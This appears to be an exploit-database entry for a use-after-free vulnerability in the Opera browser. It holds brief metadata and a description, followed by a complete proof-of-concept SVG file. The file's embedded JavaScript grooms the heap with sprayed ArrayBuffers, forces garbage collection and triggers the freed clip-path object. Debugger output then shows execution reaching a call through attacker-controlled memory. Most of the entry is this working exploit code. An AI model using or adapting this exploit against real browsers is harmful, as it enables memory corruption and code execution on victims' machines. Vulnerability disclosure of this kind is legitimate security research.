Use After Free Vulnerability in Opera Browser

vendor:

Opera Browser

by:

Cons0ul

8,8

CVSS

HIGH

Use After Free

416

CWE

Product Name: Opera Browser

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2020

Use After Free Vulnerability in Opera Browser

A use-after-free vulnerability exists in Opera Browser due to improper handling of (use tag + clippath) which tries to access freed object. An attacker can exploit this vulnerability by spraying the heap with 0x78 size of block using ArrayBuffer() and then freeing the allocation. The freed block contains the attacker's data which is then accessed by the browser.

Mitigation:

Update to the latest version of Opera Browser

Source

Exploit-DB raw data:

<svg xmlns="http://www.w3.org/2000/svg"	xmlns:xlink="http://www.w0.org/1999/xlink">
<g id="group">
<defs>
    <clipPath id="clip-circle" clip-path="url(#clip-rect)">
    </clipPath>
     <clipPath id="clip-rect">
    </clipPath>
</defs>
<circle id="rect" x="10" y="10" width="100" height="100" fill="green" />
</g>
<script><![CDATA[ 

//Author=Cons0ul

var b = new Array();

// this is our spray function where spray is allocated on LFH with exact size 0x78 
// so 0x78 size of block is created so far we are creating 0x50000 blocks
// to create 0x78 blocks we are using ArrayBuffer();

function feng_shui(){

for(i=0;i<1000;i++)window.opera.collect(); // <----- garbage collection


	for(i=0;i<0x50000;i++){
		payload = new ArrayBuffer(0x78) // use 0xb0 for 64bit machine
		payload[0]=0x6c
		payload[1]=0x03
		payload[2]=0xfe
		payload[3]=0x7f
		b.push(payload)
	}
}


// bug is use after free in handling of (use tag + clippath) witch try to access freed object
// 

		document.getElementById('rect').setAttribute('clip-path',"url(#clip-circle)");
		var c = document.createElement('use');
		c.setAttribute("xlink:href","rect")
				
		feng_shui();
		document.getElementById('clip-rect').appendChild(c);
		document.getElementById('rect').style.clipPath="url(#clip-circle)" // <----- bug
		window.opera.collect() // <------ gc() frees the allocation
		feng_shui();	//   <------------ we allocate our code at freed memory
		// at the end it tries freed block witch contains our data
		window.location.href=window.location.href;


/*	  

idc !heap -p -a ecx

  address 077c45e0 found in
    _HEAP @ b40000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        077c45d8 0010 0000  [00]   077c45e0    00078 - (free)



PS C:\Users\cons0ul> idc db ecx
077c45e0  92 48 fe 7f 00 00 00 00-00 00 00 00 00 00 00 00  .H..............
077c45f0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
077c4600  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
077c4610  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
077c4620  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
077c4630  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
077c4640  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
077c4650  00 00 00 00 00 00 00 00-89 d0 6a 5b 00 00 00 88  ..........j[....
PS C:\Users\cons0ul> idc r
eax=7ffe4892 ebx=00000001 ecx=077c45e0 edx=00000000 esi=0372e590 edi=01d40048
eip=6b8c998b esp=0013e334 ebp=00000000 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
Opera_6b430000!OpGetNextUninstallFile+0xf8583:
6b8c998b ff5008          call    dword ptr [eax+8]    ds:0023:7ffe489a=????????
*/

		]]></script>
</svg>